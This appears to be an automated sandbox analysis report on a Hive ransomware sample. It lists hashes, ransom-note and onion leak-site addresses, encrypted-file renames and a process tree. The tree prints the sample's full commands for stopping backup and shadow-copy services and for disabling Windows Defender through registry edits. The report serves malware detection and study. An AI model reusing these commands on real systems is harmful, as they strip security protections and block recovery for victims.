Analysis
-
max time kernel
148s -
max time network
121s -
platform
windows10_x64 -
resource
win10-en-20211014 -
submitted
24-11-2021 14:30
Static task
static1
Behavioral task
behavioral1
Sample
serenb.exe
Resource
win7-en-20211104
General
-
Target
serenb.exe
-
Size
3.4MB
-
MD5
177417be748814f6168171a42545f9dd
-
SHA1
9c8b988e66e0fe6f9dab69b1055e4ee200531094
-
SHA256
47dbb2594cd5eb7015ef08b7fb803cd5adc1a1fbe4849dc847c0940f1ccace35
-
SHA512
c90eebbd4663ffe4bec089e21e4f7c1a1441e21a2f78cc190b9ce85fd048bf46901aa74273695df7b6434887284a26d4fdaaf657cb5d9c5469574158adc351c2
Malware Config
Extracted
C:\Djfk_HOW_TO_DECRYPT.txt
hive
http://hiveleakdbtnp76ulyhi52eag6c6tyc3xw7ez7iqy6wc34gd2nekazyd.onion/
http://hivecust6vhekztbqgdnkks64ucehqacge3dij3gyrrpdp57zoq3ooqd.onion/
Signatures
-
Deletes Windows Defender Definitions 2 TTPs 1 IoCs
Uses mpcmdrun utility to delete all AV definitions.
Processes:
MpCmdRun.exepid Process 612 MpCmdRun.exe -
Hive
A ransomware written in Golang first seen in June 2021.
-
Clears Windows event logs 1 TTPs
-
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Modifies boot configuration data using bcdedit 1 TTPs 2 IoCs
Processes:
bcdedit.exebcdedit.exepid Process 3456 bcdedit.exe 2364 bcdedit.exe -
Modifies extensions of user files 4 IoCs
Ransomware generally changes the extension on encrypted files.
Processes:
serenb.exedescription ioc Process File renamed C:\Users\Admin\Pictures\EnterGrant.png => C:\Users\Admin\Pictures\EnterGrant.png.Puf1hpiPI2OersV_Vk7J0r1gvKikbSQe19h0FYWp0j__Fozhdthbo300.snwkz serenb.exe File opened for modification C:\Users\Admin\Pictures\EnterGrant.png.Puf1hpiPI2OersV_Vk7J0r1gvKikbSQe19h0FYWp0j__Fozhdthbo300.snwkz serenb.exe File renamed C:\Users\Admin\Pictures\CompleteLimit.tiff => C:\Users\Admin\Pictures\CompleteLimit.tiff.Puf1hpiPI2OersV_Vk7J0r1gvKikbSQe19h0FYWp0j__zZWpXAGRo9I0.snwkz serenb.exe File opened for modification C:\Users\Admin\Pictures\CompleteLimit.tiff.Puf1hpiPI2OersV_Vk7J0r1gvKikbSQe19h0FYWp0j__zZWpXAGRo9I0.snwkz serenb.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Drops file in Program Files directory 64 IoCs
Processes:
serenb.exedescription ioc Process File opened for modification C:\Program Files\WindowsApps\Microsoft.MicrosoftSolitaireCollection_3.14.1181.0_x64__8wekyb3d8bbwe\Assets\Awards\challenge\Become_a_Superstar_.png serenb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\locale\org-netbeans-modules-spi-actions_zh_CN.jar.Puf1hpiPI2OersV_Vk7J0r1gvKikbSQe19h0FYWp0j__d_m-Tk1iMoc0.snwkz serenb.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.WindowsCamera_2017.125.40.0_x64__8wekyb3d8bbwe\Assets\WindowsIcons\WindowsCameraAppList.targetsize-96.png serenb.exe File opened for modification C:\Program Files\Windows Media Player\Network Sharing\wmpnss_color48.png serenb.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.Office.OneNote_17.7668.58071.0_x64__8wekyb3d8bbwe\images\OneNoteSectionGroupMedTile.scale-100.png serenb.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.XboxApp_25.25.13009.0_x64__8wekyb3d8bbwe\Microsoft.Xbox.SmartGlass.Controls.winmd serenb.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.MSPaint_1.1702.28017.0_x64__8wekyb3d8bbwe\Assets\Images\Stickers\Sticker_ReptileEye.png serenb.exe File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_17.7906.42257.0_x64__8wekyb3d8bbwe\images\contrast-black\HxA-Yahoo-Light.scale-200.png serenb.exe File opened for modification C:\Program Files (x86)\Microsoft.NET\RedistList\AssemblyList_4_client.xml.Puf1hpiPI2OersV_Vk7J0r1gvKikbSQe19h0FYWp0j__RH85Qrt0w_s0.snwkz serenb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\locale\org-openide-options_ja.jar.Puf1hpiPI2OersV_Vk7J0r1gvKikbSQe19h0FYWp0j__cax2xLfCeAw0.snwkz serenb.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\br\LC_MESSAGES\vlc.mo.Puf1hpiPI2OersV_Vk7J0r1gvKikbSQe19h0FYWp0j__VXub-H2yCxQ0.snwkz serenb.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.Messaging_3.26.24002.0_x64__8wekyb3d8bbwe\TEE\de-DE.Messaging.config serenb.exe File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_17.7906.42257.0_x64__8wekyb3d8bbwe\images\LinkedInboxMediumTile.scale-400.png serenb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\check-mark-1x.png.Puf1hpiPI2OersV_Vk7J0r1gvKikbSQe19h0FYWp0j___YUvUZCuZBc0.snwkz serenb.exe File opened for modification C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.WindowsMaps_5.1611.10393.0_neutral_split.scale-125_8wekyb3d8bbwe\Assets\SecondaryTiles\Directions\Car\RTL\contrast-white\SmallTile.scale-125.png serenb.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.Office.OneNote_17.7668.58071.0_x64__8wekyb3d8bbwe\images\OneNoteSplashLogo.scale-200.png serenb.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1702.312.0_x64__8wekyb3d8bbwe\Assets\CalculatorAppList.contrast-white_targetsize-72.png serenb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-files\js\nls\hu-hu\Djfk_HOW_TO_DECRYPT.txt serenb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\file_types\s_shared_single_filetype.svg.Puf1hpiPI2OersV_Vk7J0r1gvKikbSQe19h0FYWp0j__y4-JyZvvcdc0.snwkz serenb.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.WindowsMaps_5.1611.10393.0_x64__8wekyb3d8bbwe\Assets\AppTiles\contrast-black\MapsAppList.targetsize-32_altform-unplated.png serenb.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.WindowsStore_11701.1001.87.0_x64__8wekyb3d8bbwe\Assets\AppTiles\StoreSmallTile.scale-200.png serenb.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.WindowsStore_11701.1001.87.0_x64__8wekyb3d8bbwe\Assets\AppTiles\contrast-white\StoreAppList.targetsize-36.png serenb.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.XboxApp_25.25.13009.0_x64__8wekyb3d8bbwe\Assets\GamesXboxHubAppList.targetsize-20_altform-unplated_contrast-white.png serenb.exe File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_17.7906.42257.0_x64__8wekyb3d8bbwe\images\contrast-black\ExchangeSmallTile.scale-200.png serenb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\ReadMe.htm.Puf1hpiPI2OersV_Vk7J0r1gvKikbSQe19h0FYWp0j__WyhQ86iHTxA0.snwkz serenb.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\MondoVL_KMS_Client-ppd.xrm-ms.Puf1hpiPI2OersV_Vk7J0r1gvKikbSQe19h0FYWp0j__9Qu_F_OCI640.snwkz serenb.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\images\buttons.png.Puf1hpiPI2OersV_Vk7J0r1gvKikbSQe19h0FYWp0j__2mzYIOGrr8o0.snwkz serenb.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.WindowsAlarms_10.1702.333.0_x64__8wekyb3d8bbwe\Assets\AlarmsAppList.contrast-white_targetsize-20.png serenb.exe File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_17.7906.42257.0_x64__8wekyb3d8bbwe\images\Office365LogoWLockup.scale-140.png serenb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\editpdf\js\nls\it-it\Djfk_HOW_TO_DECRYPT.txt serenb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\unified-share\js\nls\uk-ua\Djfk_HOW_TO_DECRYPT.txt serenb.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.MicrosoftSolitaireCollection_3.14.1181.0_x64__8wekyb3d8bbwe\Assets\DailyChallenges\Popup\FUE3_Image.jpg serenb.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.WindowsMaps_5.1611.10393.0_x64__8wekyb3d8bbwe\Assets\AppTiles\contrast-white\MapsStoreLogo.scale-200.png serenb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\da-dk\ui-strings.js.Puf1hpiPI2OersV_Vk7J0r1gvKikbSQe19h0FYWp0j__eAe48yWCNnY0.snwkz serenb.exe File opened for modification C:\Program Files\Microsoft Office\root\vfs\Fonts\private\ANTQUABI.TTF.Puf1hpiPI2OersV_Vk7J0r1gvKikbSQe19h0FYWp0j__7PqCWmC3ceU0.snwkz serenb.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.MicrosoftSolitaireCollection_3.14.1181.0_x64__8wekyb3d8bbwe\Assets\Themes\Western\mask\11d.png serenb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\cs-cz\Djfk_HOW_TO_DECRYPT.txt serenb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\send-for-sign\images\cloud_secured_lg.png.Puf1hpiPI2OersV_Vk7J0r1gvKikbSQe19h0FYWp0j__tXwFkC9L9JA0.snwkz serenb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\digsig\js\nls\sk-sk\Djfk_HOW_TO_DECRYPT.txt serenb.exe File opened for modification C:\Program Files\7-Zip\Lang\zh-cn.txt.Puf1hpiPI2OersV_Vk7J0r1gvKikbSQe19h0FYWp0j__vl6iitYy29I0.snwkz serenb.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.WindowsMaps_5.1611.10393.0_neutral_split.scale-100_8wekyb3d8bbwe\Assets\SecondaryTiles\Directions\Place\RTL\contrast-white\SmallTile.scale-100.png serenb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\images\themeless\combine_poster.jpg.Puf1hpiPI2OersV_Vk7J0r1gvKikbSQe19h0FYWp0j__NhG05umdxPY0.snwkz serenb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\files\dev\nls\ro-ro\Djfk_HOW_TO_DECRYPT.txt serenb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\js\nls\it-it\Djfk_HOW_TO_DECRYPT.txt serenb.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\sdxs\FA000000027\assets\Icons\[email protected]_Vk7J0r1gvKikbSQe19h0FYWp0j__lB9RDXLmjm00.snwkz serenb.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.3DBuilder_13.0.10349.0_x64__8wekyb3d8bbwe\Assets\manifestAssets\contrast-white\Icon.targetsize-16.png serenb.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.XboxApp_25.25.13009.0_x64__8wekyb3d8bbwe\XboxApp.UI\Resources\Images\star_3qtr.png serenb.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.16112.11601.0_x64__8wekyb3d8bbwe\Assets\contrast-black\AppList.targetsize-16_altform-unplated_contrast-black.png serenb.exe File created C:\Program Files\VideoLAN\VLC\locale\ky\LC_MESSAGES\Djfk_HOW_TO_DECRYPT.txt serenb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\en-gb\Djfk_HOW_TO_DECRYPT.txt serenb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\walk-through\js\nls\nb-no\ui-strings.js.Puf1hpiPI2OersV_Vk7J0r1gvKikbSQe19h0FYWp0j__o8kd4KiluVo0.snwkz serenb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\js\nls\en-il\Djfk_HOW_TO_DECRYPT.txt serenb.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\1033\TelemetryLog.xltx.Puf1hpiPI2OersV_Vk7J0r1gvKikbSQe19h0FYWp0j__haNWFZtjU_Y0.snwkz serenb.exe File opened for modification C:\Program Files\Windows Media Player\en-US\setup_wm.exe.mui serenb.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.0.10252.0_x64__8wekyb3d8bbwe\Assets\contrast-black\AppPackageAppList.targetsize-64_contrast-black.png serenb.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.Office.OneNote_17.7668.58071.0_x64__8wekyb3d8bbwe\images\contrast-white\OneNoteSectionWideTile.scale-400.png serenb.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.WindowsSoundRecorder_10.1702.301.0_x64__8wekyb3d8bbwe\Assets\VoiceRecorderAppList.contrast-black_targetsize-256.png serenb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\back-arrow-hover.svg.Puf1hpiPI2OersV_Vk7J0r1gvKikbSQe19h0FYWp0j__q-oaWGvHzfc0.snwkz serenb.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\sdxs\FA000000027\assets\Icons\[email protected]_Vk7J0r1gvKikbSQe19h0FYWp0j__58irVjG0GFk0.snwkz serenb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\editpdf\js\nls\ru-ru\Djfk_HOW_TO_DECRYPT.txt serenb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.e4.core.commands.nl_zh_4.4.0.v20140623020002.jar.Puf1hpiPI2OersV_Vk7J0r1gvKikbSQe19h0FYWp0j__BaDaXZPNv7E0.snwkz serenb.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.MicrosoftSolitaireCollection_3.14.1181.0_neutral_split.scale-125_8wekyb3d8bbwe\Assets\Livetiles\MicrosoftSolitaireMedTile.scale-125.jpg serenb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\uss-search\js\nls\eu-es\ui-strings.js.Puf1hpiPI2OersV_Vk7J0r1gvKikbSQe19h0FYWp0j__gVTKCFnQD_s0.snwkz serenb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\jvm.lib.Puf1hpiPI2OersV_Vk7J0r1gvKikbSQe19h0FYWp0j__Prtuh-GBENY0.snwkz serenb.exe -
Launches sc.exe
Sc.exe is a Windows utlilty to control services on the system.
-
Interacts with shadow copies 2 TTPs 1 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
Processes:
vssadmin.exepid Process 1392 vssadmin.exe -
Runs net.exe
-
Suspicious behavior: EnumeratesProcesses 8 IoCs
Processes:
powershell.exepowershell.exeserenb.exepid Process 4016 powershell.exe 4016 powershell.exe 4016 powershell.exe 1136 powershell.exe 1136 powershell.exe 1136 powershell.exe 2292 serenb.exe 2292 serenb.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
wevtutil.exewevtutil.exewmic.exewmic.exedescription pid Process Token: SeSecurityPrivilege 920 wevtutil.exe Token: SeBackupPrivilege 920 wevtutil.exe Token: SeSecurityPrivilege 1496 wevtutil.exe Token: SeBackupPrivilege 1496 wevtutil.exe Token: SeIncreaseQuotaPrivilege 3788 wmic.exe Token: SeSecurityPrivilege 3788 wmic.exe Token: SeTakeOwnershipPrivilege 3788 wmic.exe Token: SeLoadDriverPrivilege 3788 wmic.exe Token: SeSystemProfilePrivilege 3788 wmic.exe Token: SeSystemtimePrivilege 3788 wmic.exe Token: SeProfSingleProcessPrivilege 3788 wmic.exe Token: SeIncBasePriorityPrivilege 3788 wmic.exe Token: SeCreatePagefilePrivilege 3788 wmic.exe Token: SeBackupPrivilege 3788 wmic.exe Token: SeRestorePrivilege 3788 wmic.exe Token: SeShutdownPrivilege 3788 wmic.exe Token: SeDebugPrivilege 3788 wmic.exe Token: SeSystemEnvironmentPrivilege 3788 wmic.exe Token: SeRemoteShutdownPrivilege 3788 wmic.exe Token: SeUndockPrivilege 3788 wmic.exe Token: SeManageVolumePrivilege 3788 wmic.exe Token: 33 3788 wmic.exe Token: 34 3788 wmic.exe Token: 35 3788 wmic.exe Token: 36 3788 wmic.exe Token: SeIncreaseQuotaPrivilege 1132 wmic.exe Token: SeSecurityPrivilege 1132 wmic.exe Token: SeTakeOwnershipPrivilege 1132 wmic.exe Token: SeLoadDriverPrivilege 1132 wmic.exe Token: SeSystemProfilePrivilege 1132 wmic.exe Token: SeSystemtimePrivilege 1132 wmic.exe Token: SeProfSingleProcessPrivilege 1132 wmic.exe Token: SeIncBasePriorityPrivilege 1132 wmic.exe Token: SeCreatePagefilePrivilege 1132 wmic.exe Token: SeBackupPrivilege 1132 wmic.exe Token: SeRestorePrivilege 1132 wmic.exe Token: SeShutdownPrivilege 1132 wmic.exe Token: SeDebugPrivilege 1132 wmic.exe Token: SeSystemEnvironmentPrivilege 1132 wmic.exe Token: SeRemoteShutdownPrivilege 1132 wmic.exe Token: SeUndockPrivilege 1132 wmic.exe Token: SeManageVolumePrivilege 1132 wmic.exe Token: 33 1132 wmic.exe Token: 34 1132 wmic.exe Token: 35 1132 wmic.exe Token: 36 1132 wmic.exe Token: SeIncreaseQuotaPrivilege 1132 wmic.exe Token: SeSecurityPrivilege 1132 wmic.exe Token: SeTakeOwnershipPrivilege 1132 wmic.exe Token: SeLoadDriverPrivilege 1132 wmic.exe Token: SeSystemProfilePrivilege 1132 wmic.exe Token: SeSystemtimePrivilege 1132 wmic.exe Token: SeProfSingleProcessPrivilege 1132 wmic.exe Token: SeIncBasePriorityPrivilege 1132 wmic.exe Token: SeCreatePagefilePrivilege 1132 wmic.exe Token: SeBackupPrivilege 1132 wmic.exe Token: SeRestorePrivilege 1132 wmic.exe Token: SeShutdownPrivilege 1132 wmic.exe Token: SeDebugPrivilege 1132 wmic.exe Token: SeSystemEnvironmentPrivilege 1132 wmic.exe Token: SeRemoteShutdownPrivilege 1132 wmic.exe Token: SeUndockPrivilege 1132 wmic.exe Token: SeManageVolumePrivilege 1132 wmic.exe Token: 33 1132 wmic.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
serenb.exenet.exenet.exenet.exenet.exenet.exenet.exenet.exenet.exenet.exedescription pid Process procid_target PID 2292 wrote to memory of 872 2292 serenb.exe 68 PID 2292 wrote to memory of 872 2292 serenb.exe 68 PID 872 wrote to memory of 1176 872 net.exe 70 PID 872 wrote to memory of 1176 872 net.exe 70 PID 2292 wrote to memory of 1524 2292 serenb.exe 71 PID 2292 wrote to memory of 1524 2292 serenb.exe 71 PID 1524 wrote to memory of 1428 1524 net.exe 73 PID 1524 wrote to memory of 1428 1524 net.exe 73 PID 2292 wrote to memory of 1716 2292 serenb.exe 74 PID 2292 wrote to memory of 1716 2292 serenb.exe 74 PID 1716 wrote to memory of 296 1716 net.exe 76 PID 1716 wrote to memory of 296 1716 net.exe 76 PID 2292 wrote to memory of 3588 2292 serenb.exe 77 PID 2292 wrote to memory of 3588 2292 serenb.exe 77 PID 3588 wrote to memory of 420 3588 net.exe 79 PID 3588 wrote to memory of 420 3588 net.exe 79 PID 2292 wrote to memory of 440 2292 serenb.exe 80 PID 2292 wrote to memory of 440 2292 serenb.exe 80 PID 440 wrote to memory of 3172 440 net.exe 82 PID 440 wrote to memory of 3172 440 net.exe 82 PID 2292 wrote to memory of 2236 2292 serenb.exe 83 PID 2292 wrote to memory of 2236 2292 serenb.exe 83 PID 2236 wrote to memory of 1836 2236 net.exe 85 PID 2236 wrote to memory of 1836 2236 net.exe 85 PID 2292 wrote to memory of 1040 2292 serenb.exe 86 PID 2292 wrote to memory of 1040 2292 serenb.exe 86 PID 1040 wrote to memory of 2648 1040 net.exe 88 PID 1040 wrote to memory of 2648 1040 net.exe 88 PID 2292 wrote to memory of 2088 2292 serenb.exe 89 PID 2292 wrote to memory of 2088 2292 serenb.exe 89 PID 2088 wrote to memory of 608 2088 net.exe 91 PID 2088 wrote to memory of 608 2088 net.exe 91 PID 2292 wrote to memory of 1156 2292 serenb.exe 92 PID 2292 wrote to memory of 1156 2292 serenb.exe 92 PID 1156 wrote to memory of 372 1156 net.exe 94 PID 1156 wrote to memory of 372 1156 net.exe 94 PID 2292 wrote to memory of 3936 2292 serenb.exe 95 PID 2292 wrote to memory of 3936 2292 serenb.exe 95 PID 2292 wrote to memory of 436 2292 serenb.exe 97 PID 2292 wrote to memory of 436 2292 serenb.exe 97 PID 2292 wrote to memory of 912 2292 serenb.exe 99 PID 2292 wrote to memory of 912 2292 serenb.exe 99 PID 2292 wrote to memory of 1488 2292 serenb.exe 101 PID 2292 wrote to memory of 1488 2292 serenb.exe 101 PID 2292 wrote to memory of 2336 2292 serenb.exe 103 PID 2292 wrote to memory of 2336 2292 serenb.exe 103 PID 2292 wrote to memory of 1544 2292 serenb.exe 105 PID 2292 wrote to memory of 1544 2292 serenb.exe 105 PID 2292 wrote to memory of 1736 2292 serenb.exe 107 PID 2292 wrote to memory of 1736 2292 serenb.exe 107 PID 2292 wrote to memory of 3644 2292 serenb.exe 109 PID 2292 wrote to memory of 3644 2292 serenb.exe 109 PID 2292 wrote to memory of 3156 2292 serenb.exe 111 PID 2292 wrote to memory of 3156 2292 serenb.exe 111 PID 2292 wrote to memory of 768 2292 serenb.exe 113 PID 2292 wrote to memory of 768 2292 serenb.exe 113 PID 2292 wrote to memory of 3984 2292 serenb.exe 115 PID 2292 wrote to memory of 3984 2292 serenb.exe 115 PID 2292 wrote to memory of 2820 2292 serenb.exe 117 PID 2292 wrote to memory of 2820 2292 serenb.exe 117 PID 2292 wrote to memory of 3376 2292 serenb.exe 119 PID 2292 wrote to memory of 3376 2292 serenb.exe 119 PID 2292 wrote to memory of 1856 2292 serenb.exe 121 PID 2292 wrote to memory of 1856 2292 serenb.exe 121
Processes
-
C:\Users\Admin\AppData\Local\Temp\serenb.exe"C:\Users\Admin\AppData\Local\Temp\serenb.exe"1⤵
- Modifies extensions of user files
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:2292 -
C:\Windows\SYSTEM32\net.exenet.exe stop "SamSs" /y2⤵
- Suspicious use of WriteProcessMemory
PID:872 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "SamSs" /y3⤵PID:1176
-
-
-
C:\Windows\SYSTEM32\net.exenet.exe stop "SDRSVC" /y2⤵
- Suspicious use of WriteProcessMemory
PID:1524 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "SDRSVC" /y3⤵PID:1428
-
-
-
C:\Windows\SYSTEM32\net.exenet.exe stop "SstpSvc" /y2⤵
- Suspicious use of WriteProcessMemory
PID:1716 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "SstpSvc" /y3⤵PID:296
-
-
-
C:\Windows\SYSTEM32\net.exenet.exe stop "UI0Detect" /y2⤵
- Suspicious use of WriteProcessMemory
PID:3588 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "UI0Detect" /y3⤵PID:420
-
-
-
C:\Windows\SYSTEM32\net.exenet.exe stop "vmicvss" /y2⤵
- Suspicious use of WriteProcessMemory
PID:440 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "vmicvss" /y3⤵PID:3172
-
-
-
C:\Windows\SYSTEM32\net.exenet.exe stop "VSS" /y2⤵
- Suspicious use of WriteProcessMemory
PID:2236 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "VSS" /y3⤵PID:1836
-
-
-
C:\Windows\SYSTEM32\net.exenet.exe stop "wbengine" /y2⤵
- Suspicious use of WriteProcessMemory
PID:1040 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "wbengine" /y3⤵PID:2648
-
-
-
C:\Windows\SYSTEM32\net.exenet.exe stop "WebClient" /y2⤵
- Suspicious use of WriteProcessMemory
PID:2088 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "WebClient" /y3⤵PID:608
-
-
-
C:\Windows\SYSTEM32\net.exenet.exe stop "UnistoreSvc_136d4" /y2⤵
- Suspicious use of WriteProcessMemory
PID:1156 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "UnistoreSvc_136d4" /y3⤵PID:372
-
-
-
C:\Windows\SYSTEM32\sc.exesc.exe config "SamSs" start= disabled2⤵PID:3936
-
-
C:\Windows\SYSTEM32\sc.exesc.exe config "SDRSVC" start= disabled2⤵PID:436
-
-
C:\Windows\SYSTEM32\sc.exesc.exe config "SstpSvc" start= disabled2⤵PID:912
-
-
C:\Windows\SYSTEM32\sc.exesc.exe config "UI0Detect" start= disabled2⤵PID:1488
-
-
C:\Windows\SYSTEM32\sc.exesc.exe config "vmicvss" start= disabled2⤵PID:2336
-
-
C:\Windows\SYSTEM32\sc.exesc.exe config "VSS" start= disabled2⤵PID:1544
-
-
C:\Windows\SYSTEM32\sc.exesc.exe config "wbengine" start= disabled2⤵PID:1736
-
-
C:\Windows\SYSTEM32\sc.exesc.exe config "WebClient" start= disabled2⤵PID:3644
-
-
C:\Windows\SYSTEM32\sc.exesc.exe config "UnistoreSvc_136d4" start= disabled2⤵PID:3156
-
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f2⤵PID:768
-
-
C:\Windows\SYSTEM32\reg.exereg.exe delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f2⤵PID:3984
-
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f2⤵PID:2820
-
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f2⤵PID:3376
-
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f2⤵PID:1856
-
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f2⤵PID:1584
-
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f2⤵PID:2412
-
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f2⤵PID:2864
-
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f2⤵PID:3840
-
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f2⤵PID:2700
-
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f2⤵PID:1292
-
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f2⤵PID:1592
-
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f2⤵PID:8
-
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "0" /f2⤵PID:1468
-
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f2⤵PID:3780
-
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f2⤵PID:3172
-
-
C:\Windows\SYSTEM32\schtasks.exeschtasks.exe /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable2⤵PID:3872
-
-
